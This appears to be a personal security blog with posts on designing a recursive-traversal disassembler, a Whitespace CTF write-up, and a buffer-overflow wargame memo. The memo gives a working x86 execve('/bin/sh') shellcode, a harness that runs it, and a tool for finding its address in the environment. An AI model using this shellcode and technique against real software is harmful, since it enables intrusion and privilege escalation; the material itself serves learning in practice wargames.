Friday, September 6, 2013

Understanding recursive traversal algorithms: towards a software architecture

Update 07/09/2013: there is now a GitHub repo for the experimentation: https://github.com/Ge0/RecursiveTraversalx86 and I'll try to fill it as much as I can. If you want to get involved, feel free to drop a comment or shoot me an email. Thanks!

This article follows on from the Thoughts about disassembling algorithms one. If you haven't read it yet, I strongly suggest you do so, otherwise you won't find much interest in the following lines.

After having gathered tips and tricks about how the algorithms should behave, another interesting step is to think about a modular software architecture that properly encapsulates them, thus preparing the ground for further features such as:
  • disassembling other instruction sets;
  • interchanging mnemonics syntaxes;
  • embedding the algorithms into pieces of software;
  • and so on...
One widely known tool that helps when thinking about software architecture is UML. Although it is not especially appreciated by everyone, I found it quite useful even though I only used a tiny subset of its features (for example, specifying the visibility of methods and attributes, or being exhaustive about the attributes of a class). I actually just wanted an accurate representation of what I am supposed to build.

But let's not fall into an interminable and boring speech; instead, let's dig into our architecture.

Abstract representation of instructions

Let me remind you that I came up with four kinds of instructions: normal, referencing, flow and hijack-flow.

First and foremost, we must think about one point: what do these types have in common? One obvious property I came up with is the total size. By this I mean the size of any prefix plus the size of the opcode(s) plus the size of the operands; in a nutshell, it is the size of the stream of bytes we decoded to build one single instruction.

A referencing instruction is an instruction that, once decoded, turns out to deal with a memory address. It can either fetch data stored at that address or jump to it; there are actually many possibilities. Just keep in mind that it has a memory address to do something with.

Starting from this statement, we may establish that both the flow instruction type and the hijack-flow instruction type are referencing instructions as well.

Last but not least, a hijack-flow instruction is obviously a flow instruction, except that it also hijacks the execution flow (unconditional jump, ret, etc.).

We have a kind of beautiful inheritance so far. HijackFlowInstruction IS A FlowInstruction, FlowInstruction IS A ReferencingInstruction, and ReferencingInstruction IS AN Instruction.

Figure 1 sums things up with a UML diagram showing the inheritance between the classes.

 Figure 1 - Inheritance among the instruction types
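
To make this more concrete, here is a minimal C++ sketch of the hierarchy. Only the class names and the IS-A relationships come from the design above; the attributes and accessors are assumptions made for the example:

// Minimal sketch of the instruction hierarchy; names other than the class
// names are illustrative assumptions.
#include <cstddef>
#include <cstdint>

class Instruction {
public:
    explicit Instruction(std::size_t totalSize) : totalSize_(totalSize) {}
    virtual ~Instruction() {}
    // Prefix + opcode(s) + operands: the bytes consumed to build the instruction.
    std::size_t totalSize() const { return totalSize_; }
private:
    std::size_t totalSize_;
};

class ReferencingInstruction : public Instruction {
public:
    ReferencingInstruction(std::size_t totalSize, std::uint32_t target)
        : Instruction(totalSize), target_(target) {}
    // The memory address the instruction does something with.
    std::uint32_t target() const { return target_; }
private:
    std::uint32_t target_;
};

// Likely to alter the program counter (jump, call, ...): the target holds code.
class FlowInstruction : public ReferencingInstruction {
public:
    using ReferencingInstruction::ReferencingInstruction;
};

// Also hijacks the execution flow (unconditional jump, ret): the bytes that
// follow it are not necessarily meant to be executed.
class HijackFlowInstruction : public FlowInstruction {
public:
    using FlowInstruction::FlowInstruction;
};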

Thanks to such a data structure, our algorithm can adopt different behaviours according to the type of instruction it disassembles. But that is not enough: we also have to focus on binary blocks, because they are an important part of recursive traversal algorithms. They constitute a template that defines what must be treated as code and what must be treated as data.

Binary Blocks: showing the way we rule

Do you remember Figure 2 of the previous article? It showed what we want to do with a binary region.

A binary block is made of a reference address and the size it covers. We won't store the content itself, since we don't need it; moreover, it would cost a lot of memory.

As we do want to distinguish code from data (how many times shall I repeat it?!), we can assume we have at least two corresponding kinds of blocks:

  • Code blocks: these blocks will handle binary code that is meant to be disassembled with the linear sweep algorithm;
  •  Data blocks: these blocks will handle data.
Regarding the code blocks: in the previous article I said the linear sweep algorithm did not fit our needs on its own, but since we now know that a code block contains code and only code from one address to another, that algorithm becomes perfectly suitable here.

Another probable issue regarding code blocks is the following: assume you are disassembling instructions sequentially, registering referenced memory addresses that are likely to contain code. What if the reference address we have just computed points into an existing block? We won't disassemble the same code twice, but the instruction still needs to reference its target with a label once we produce the final listing (I mean the source code). So we have to record this address in the current code block. As a consequence, we will state that a code block owns a list of symbols, which are the addresses referenced inside the block.

This has two benefits. Firstly, it avoids splitting a block, which could be a cumbersome operation; secondly, if the memory address points into the middle of an instruction, it is simply considered an invalid symbol and therefore ends up as a raw binary address in the listing. We don't really know how to handle such a case, but we would still have source code that produces exactly the same binary stream we disassembled.
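
As a rough illustration of that rule, here is a hedged C++ sketch; the CodeBlock structure and the handleTarget() helper are invented for the example and are not meant to be the final API:

#include <cstddef>
#include <cstdint>
#include <set>
#include <stack>
#include <vector>

// Minimal stand-in for a code block: start address, covered size, and the
// addresses referenced inside it (symbols).
struct CodeBlock {
    std::uint32_t start;
    std::size_t size;
    std::set<std::uint32_t> symbols;
    bool contains(std::uint32_t a) const { return a >= start && a < start + size; }
};

// When a freshly computed target lands inside an existing block, record it as
// a symbol instead of splitting the block or disassembling the code twice.
void handleTarget(std::uint32_t target,
                  std::vector<CodeBlock>& blocks,
                  std::stack<std::uint32_t>& toAnalyse) {
    for (CodeBlock& block : blocks) {
        if (block.contains(target)) {
            block.symbols.insert(target);  // will become a label in the listing
            return;
        }
    }
    toAnalyse.push(target);                // brand-new address to analyse later
}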

Let's focus on the data blocks now. As low-level programmers we know several common data sizes: 1 byte (BYTE), 2 bytes (WORD), 4 bytes (DWORD) and 8 bytes (QWORD).

For example, one might find it interesting to represent a piece of data as a DWORD instead of a stream of bytes, especially if that piece of data is actually a memory address according to the context. Therefore, sometimes, one line of:

DD 0xdeadbeef ; DD stands for Declare Double word

Would be more suitable than:

DB 0xef, 0xbe, 0xad, 0xde ; DB stands for Declare Byte

Thus our data block must handle the granularity of the data type it contains. Even though we won't often end up with data blocks containing multiple words or dwords, since we only deal with static memory addresses and don't perform symbolic execution, printing data in word or dword format is still interesting, especially if we want to encode, for example, a binary header into our assembly listing!
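
As a small illustration of that granularity, here is a sketch of how a data block could be rendered; the printData() function and its layout are made up for the example:

#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

// Print raw bytes as DB/DW/DD directives depending on the chosen unit.
// Purely illustrative: a real listing generator would also handle the
// leftover bytes when the buffer size is not a multiple of the unit.
void printData(const std::vector<std::uint8_t>& bytes, std::size_t unit) {
    for (std::size_t i = 0; i + unit <= bytes.size(); i += unit) {
        std::uint32_t value = 0;
        for (std::size_t j = 0; j < unit; ++j)   // little-endian read
            value |= static_cast<std::uint32_t>(bytes[i + j]) << (8 * j);
        switch (unit) {
            case 1: std::printf("DB 0x%02x\n", value); break;
            case 2: std::printf("DW 0x%04x\n", value); break;
            case 4: std::printf("DD 0x%08x\n", value); break;
        }
    }
}

Feeding it the bytes 0xef, 0xbe, 0xad, 0xde with a unit of 4 would print the DD 0xdeadbeef line shown above, while a unit of 1 would print the four DB lines.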

So does a data block need a size attribute when it already states that the pointed data is a word or larger? At first glance the answer is no, but I decided otherwise, and I will explain why.

Suppose you have previously reverse engineered the binary you want to disassemble. With any luck, you have identified valuable information that our algorithm could not find on its own, because it does not perform any symbolic execution. For example, you may have spotted a callback whose address is dynamically computed, or a function pointer table somewhere in memory.

One could enjoy feeding the algorithm with the information one has found. Actually, it is already the case: you provide the entry point. But what if you could provide other information like "there's code at this address, and exactly 8 QWORDs at that address"? This would help us end up with a listing that is as clear as possible.

That is why we will keep a size attribute even in a word block or a dword block. Figure 2 shows a tiny UML diagram that summarizes what I have tried to explain:

Figure 2 - Two types of blocks to handle a binary region

You may notice there is a disass() method in the three classes; I should have mentioned it sooner. It is a temporary way to disassemble a binary block, since we don't disassemble a code block the same way we disassemble a data block. Polymorphism should do its magic at this point, unless I eventually find out it does not lead to a flexible architecture. Maybe the Visitor pattern should be applied instead, in order to separate what may change (the algorithms) from what should not. We'll see later.
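
To show where that polymorphism would sit, here is one more hedged sketch; again the names are assumptions and the method bodies are left as comments:

#include <cstddef>
#include <cstdint>

// Sketch of the block hierarchy from Figure 2; every name is an assumption.
class BinaryBlock {
public:
    BinaryBlock(std::uint32_t start, std::size_t size)
        : start_(start), size_(size) {}
    virtual ~BinaryBlock() {}
    // Each kind of block knows how to turn itself into listing lines.
    virtual void disass() const = 0;
protected:
    std::uint32_t start_;
    std::size_t size_;
};

class CodeBlock : public BinaryBlock {
public:
    using BinaryBlock::BinaryBlock;
    void disass() const override { /* linear sweep over [start_, start_ + size_) */ }
};

class DataBlock : public BinaryBlock {
public:
    DataBlock(std::uint32_t start, std::size_t size, std::size_t unit)
        : BinaryBlock(start, size), unit_(unit) {}
    void disass() const override { /* emit DB/DW/DD lines of unit_ bytes each */ }
private:
    std::size_t unit_;  // 1, 2, 4 or 8 bytes per emitted item
};

A Visitor-based variant would instead move disass() out of the blocks into a separate visitor class, so the output strategy could change without touching the block types.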

By navigating through every single binary block that has been produced by the algorithm as well as by the user, a binary region can easily be disassembled to produce accurate results.

What's next?

I'll try to keep releasing small articles like the first ones. I am also thinking about releasing source code (still nothing, damn!) with a concrete experiment on x86 using the libdasm project. I also checked out the libasm project - which is part of ERESI. Choosing the most suitable library takes a bit of time and I will try to figure it out as quickly as possible.

So, next time, I'll try to show some concrete material, like disassembling an x86 binary region and producing a listing. If not, you will at least be given some examples of what I want to do (sample inputs and outputs) so as to better understand the purpose of my project.

Thanks for reading this article. Feel free to drop some feedback, whether it is about English mistakes or a better vision of my immature software architecture. :)

Ge0

Sunday, August 18, 2013

Memo & tools for wargames

Here is a quick post acting as a self-reminder for how to successfully solve wargame levels when you meet buffer overflow vulnerabilities. This post may change in the future if I find anything useful to add.

Shellcode

Here is the one I always use:

\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0
\x0b\x52\x51\x53\x89\xe1\xcd\x80

Size: 28 bytes. You may seek better shellcode (more compact & with setuid support). Jonathan Salwan has made a great database accessible here: http://www.shell-storm.org/shellcode/


ge0@vlunbuntu:~$ echo -ne "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" > shellcode
ge0@vlunbuntu:~$ objdump -D --target binary -mi386 shellcode 
shellcode:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0: 31 c0                 xor    %eax,%eax
   2: 89 c2                 mov    %eax,%edx
   4: 50                    push   %eax
   5: 68 6e 2f 73 68        push   $0x68732f6e
   a: 68 2f 2f 62 69        push   $0x69622f2f
   f: 89 e3                 mov    %esp,%ebx
  11: 89 c1                 mov    %eax,%ecx
  13: b0 0b                 mov    $0xb,%al
  15: 52                    push   %edx
  16: 51                    push   %ecx
  17: 53                    push   %ebx
  18: 89 e1                 mov    %esp,%ecx
  1a: cd 80                 int    $0x80
ge0@vlunbuntu:~$ 


Test:


ge0@vlunbuntu:~$ cat testshellcode.c
const char* shellcode = 
"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89"
"\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";

int main() {
 void (*sh)() = (void(*)())shellcode;
 sh();
}
ge0@vlunbuntu:~$ gcc -o testshellcode testshellcode.c
ge0@vlunbuntu:~$ ./testshellcode 
$ whoami
ge0
$ exit
ge0@vlunbuntu:~$ 


Retrieving an environment variable's address

If you put your shellcode in an environment variable, a small tool is useful to recover its address, given the variable name and the name of the target binary.


ge0@vlunbuntu:~/c$ cat getenv.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 char *ptr;

 if(argc < 3) {
  printf("Usage: %s <environment variable> <target name program>\n", argv[0]);
  exit(0);
 }
 ptr = getenv(argv[1]); /* get env var location */
 ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
 printf("%s will be at %p\n", argv[1], ptr);

 return 0;
}
ge0@vlunbuntu:~/c$ gcc -o getenv getenv.c
ge0@vlunbuntu:~/c$ ./getenv
Usage: ./getenv <environment variable> <target name program>
ge0@vlunbuntu:~/c$ export SHELLCODE=`echo -ne "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"`
ge0@vlunbuntu:~/c$ echo $SHELLCODE
1���Phn/shh//bi�����
                    RQS��̀
ge0@vlunbuntu:~/c$ ./getenv SHELLCODE ARandomBinaryToExploit
SHELLCODE will be at 0xbf8355b0
ge0@vlunbuntu:~/c$


And if you want to get things done quickly:


ge0@vlunbuntu:~/c$ wget http://geoffrey.royer.free.fr/ge0/blog/memo_wargame/getenv.c 2> /dev/null
ge0@vlunbuntu:~/c$ gcc -o getenv getenv.c


Please find all the interesting files there: http://geoffrey.royer.free.fr/ge0/blog/memo_wargame

Enjoy & happy hacking!

Ge0

Thursday, August 8, 2013

Thoughts about disassembling algorithms

A few days ago, I went back to an old project that has been on my mind for over two years now. I never really worked on it, for lack of motivation and skill.

Recently I came to the conclusion that if I started gently, I could manage to do something valuable. So this article will focus on one problem that is part of my project: disassembling algorithms.

If you have some acquaintance with the topic, then you should know there are at least two main algorithms used to disassemble binary code:
  • Linear sweep: the simplest algorithm; it takes a region and disassembles it sequentially, converting every byte it finds into an instruction, regardless of whether it really is an instruction or simply some data.
  • Recursive traversal: a more complex algorithm that follows the code's execution flow, disassembling the portions referenced by other instructions such as (un)conditional jumps. Such an algorithm makes it possible to distinguish code from data.
You can probably guess that this post will focus on the latter algorithm, because it is a bit more complicated than the first one. Moreover, you can find it in many well-known pieces of software, such as OllyDbg or, most famously, IDA. There are also open-source tools that implement this algorithm, like the miasm framework.

Several questions may come to mind when you think about such an algorithm. For example, in Intel x86 assembly language, given a region of code to be disassembled for readability purposes, how should the algorithm behave when it reaches a conditional jump? What about an unconditional one? Do not forget the call & ret instructions either!

When you meet an instruction that references another memory address that may be executed depending on the context (I mean register and flag values), you have to analyse that address as well, while still disassembling the instructions that follow the current one if it is a conditional jump or a call.

In a nutshell, I came up with a hierarchy that structures the different kinds of instructions and will help us implement the recursive traversal algorithm:

  • Normal instruction: nothing special to say about it; such instructions do not deal with direct memory references (examples: xor eax, eax; mov eax, 5; mov eax, [edx+4]; etc.);
  • Referencing instruction: contrary to a normal instruction, this one deals with a direct memory address. It can be a branching instruction (call 0xdeadbeef) as well as an instruction that loads a value from an address (mov esi, [0xdeadbeef]). The latter hints that there is data at the given address, not code;
  • Flow instruction: a referencing instruction that is likely to alter the program counter: jumps, calls, etc. The referenced memory address therefore obviously contains code;
  • Hijack-flow instruction: I couldn't find a better term, since English is not my first language, but I like to think it is understandable: this last category covers unconditional jumps and ret instructions, since the opcodes that follow them, if any, are not necessarily meant to be executed.
With such instruction types, it becomes quite possible to disassemble binary code - no matter which instruction set it comes from - with the recursive traversal algorithm. Indeed, you can assign a custom behaviour to each instruction category and record the memory addresses to disassemble or reference in your region.

As we said earlier, the main goal of this algorithm is to distinguish code from data. By tracing through the code, we will be able to record a lot of information.

The miasm framework models the execution flow by identifying blocks of code and chaining them together through the branching instructions that tie them. A block is made of a starting memory address and a length in bytes. Once you have these blocks within your memory region, you can assume that they contain code and that the other, non-referenced bytes are data. This is not sufficient, but it is a good start. Figure 1 shows a diagram explaining how splitting a code region into binary blocks could work.

Figure 1 - Splitting a code region into binary blocks

In this example, written in pseudo-code, we can see a jmp $+3 instruction, which in our case means "jump 3 instructions farther" (whereas, in the Intel instruction set, it means "jump 3 bytes farther"). The instruction referenced by our jump is "push 0x03". The other instructions, "xor eax, eax" and "mov eax, 0xdeadbeef", are bypassed and therefore not referenced by any binary block. That doesn't actually matter, because there is no reason to execute this chunk of code.

To sum things up, still in our example, the first block goes from "push ebp" up to "jmp $+3" and contains 3 instructions (in a real case the length would be counted in bytes, but you get the idea), and the second one goes from "push 0x03" up to the last instruction - ret.

After having gathered all the information regarding the code blocks, it will be easy enough to disassemble code that is likely to be executed.

Now that we have a rough idea of what we want to do, we can design a simple flowchart explaining the recursive traversal algorithm. A few words to explain the steps...

We will maintain a stack of addresses to analyse, that is, addresses that contain code, not data. The first address pushed onto the stack is the program's entry point.

Then we enter a loop, popping the address at the top of the stack. Before disassembling the opcodes to get the desired instruction, several checks are performed: have we successfully popped an address? Is the address at the end of the memory region, meaning there is no opcode left to disassemble?

If there are enough remaining opcodes, we disassemble them, computing the current instruction's length and adding it to a running total. That total is ultimately meant to be the block's length.

Things become interesting when we meet a flow instruction (see the categories I suggested above). In that case, we push the target address onto the stack for further disassembly, provided this address has not been analysed yet (i.e. referenced by an existing block). And depending on whether the instruction hijacks the current flow (unconditional jump / ret) or not, we close the binary block we are currently feeding and start a new one.
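
Before the flowchart, here is a rough C++ sketch of that loop. The Instr structure and the decode()/saveBlock() helpers are assumed for the sake of illustration; they are not a real library API:

#include <cstddef>
#include <cstdint>
#include <set>
#include <stack>

// Assumed decoded-instruction record and helpers, declared but not implemented.
struct Instr {
    std::size_t   totalSize;  // bytes consumed: prefix + opcode(s) + operands
    std::uint32_t target;     // referenced address, if any
    bool          isFlow;     // alters the program counter (jump, call, ...)
    bool          isHijack;   // unconditional jump / ret
};
Instr decode(const std::uint8_t* region, std::uint32_t address);
void saveBlock(std::uint32_t start, std::size_t size);

void traverse(const std::uint8_t* region, std::size_t regionSize,
              std::uint32_t entryPoint) {
    std::stack<std::uint32_t> toAnalyse;   // addresses assumed to contain code
    std::set<std::uint32_t> visited;       // instruction addresses already decoded
    toAnalyse.push(entryPoint);

    while (!toAnalyse.empty()) {
        std::uint32_t address = toAnalyse.top();
        toAnalyse.pop();
        if (visited.count(address))
            continue;                       // already decoded as part of a block

        std::size_t blockSize = 0;          // running total = block length
        while (address + blockSize < regionSize) {
            std::uint32_t current = address + blockSize;
            Instr instr = decode(region, current);
            visited.insert(current);
            blockSize += instr.totalSize;

            if (instr.isFlow && !visited.count(instr.target))
                toAnalyse.push(instr.target);   // new code to analyse later
            if (instr.isHijack)                 // unconditional jump / ret
                break;                          // close the current block
        }
        saveBlock(address, blockSize);          // record [address, address + blockSize)
    }
}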

Since a picture is worth much more than a long speech, let me show you Figure 2. It simply depicts the algorithm I just explained.


Figure 2 - Experimental Recursive Traversal flow chart

I'm willing to believe there are much better algorithms than mine. I haven't dug far enough into the miasm code yet, even though it is the only concrete example I have, but this article aimed to explain one way of understanding how such an algorithm could work.

This could be the cornerstone of many projects: a reverse engineering tool, a simple disassembler, a behaviour analyser. Ideas are not what is missing, just time!

Thanks for having read.

Ge0

References:
Miasm - Reverse Engineering framework - http://code.google.com/p/miasm
Binary Disassembly Block Coverage by Symbolic Execution vs. Recursive Descent - http://www.reddit.com/r/ReverseEngineering/comments/16tmpu/binary_disassembly_block_coverage_by_symbolic/
The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler - http://www.amazon.com/The-Ida-Pro-Book-Disassembler/dp/1593272898

Sunday, March 17, 2013

ForbiddenBits Ctf WriteUp - Invisible

Hi Folks,

I tried the ForbiddenBits CTF on my own this weekend, and despite my lack of motivation I managed to complete one of the challenges; it's called "invisible".

We are given a URL that points to... a blank page. Not that blank, actually: viewing the source code & pressing Ctrl+A shows that the page contains spaces and tabs.

You can find the content at http://geoffrey.royer.free.fr/ge0/blog/forbiddenbits_writeup_invisible/file.txt

I then remembered a programming language called WhiteSpace, and I felt lucky! All we have to do is download a WhiteSpace interpreter / debugger to run the script. You can find one at http://www.burghard.info/Code/Whitespace/index.html. I have compiled the program for the Windows platform here: http://geoffrey.royer.free.fr/ge0/blog/forbiddenbits_writeup_invisible/inter.exe

Compiling the program & launching it with our whitespace script runs it right away; the challenge is actually not over, as we are asked to input a password, and if our password is wrong, we are told so.

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
pass
wrong

Since I am not a WhiteSpace hacker, I decide to run the script with the debug option.

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt -d
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
1 push 119
2 push 0
3 inc

There are three instructions that push values, probably onto a stack? It's not such a big deal; by instinct I decide to find out what the 119 means. Its ASCII value corresponds to 'w'. Typing a w and pressing enter makes the interpreter run through more code.

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt -d
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
1 push 119
2 push 0
3 inc
w
4 push 0
5 retrive
6 sub
7 jumpz 325
9 label 325
10 push 115
11 push 0
12 inc
13 push 0
14 retrive
15 sub
16 jumpz 327
17 jump 323
129 label 323
130 push 119
131 outc
w132 push 114
133 outc
r134 push 111
135 outc
o136 push 110
137 outc
n138 push 103
139 outc
g140 exit

It looks like the more correct characters you provide, the more of the remaining ones you can find. We can see the "push 115" instruction after a kind of conditional jump; the value 115 maps to 's' in the ASCII table. By repeating this procedure we can find the password: "wslang".

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
wslang
The key is We_are_Nasus

Funny challenge, pretty straightforward and not that time-consuming if you already know what WhiteSpace is. Otherwise you've gained another piece of (useless :P) knowledge. It was my only write-up for this CTF. I am a wanker and I know it. See you guys! :))

Ge0

Sources:

ForbiddenBits - http://forbiddenbits.net/
WhiteSpace language - http://en.wikipedia.org/wiki/Whitespace_%28programming_language%29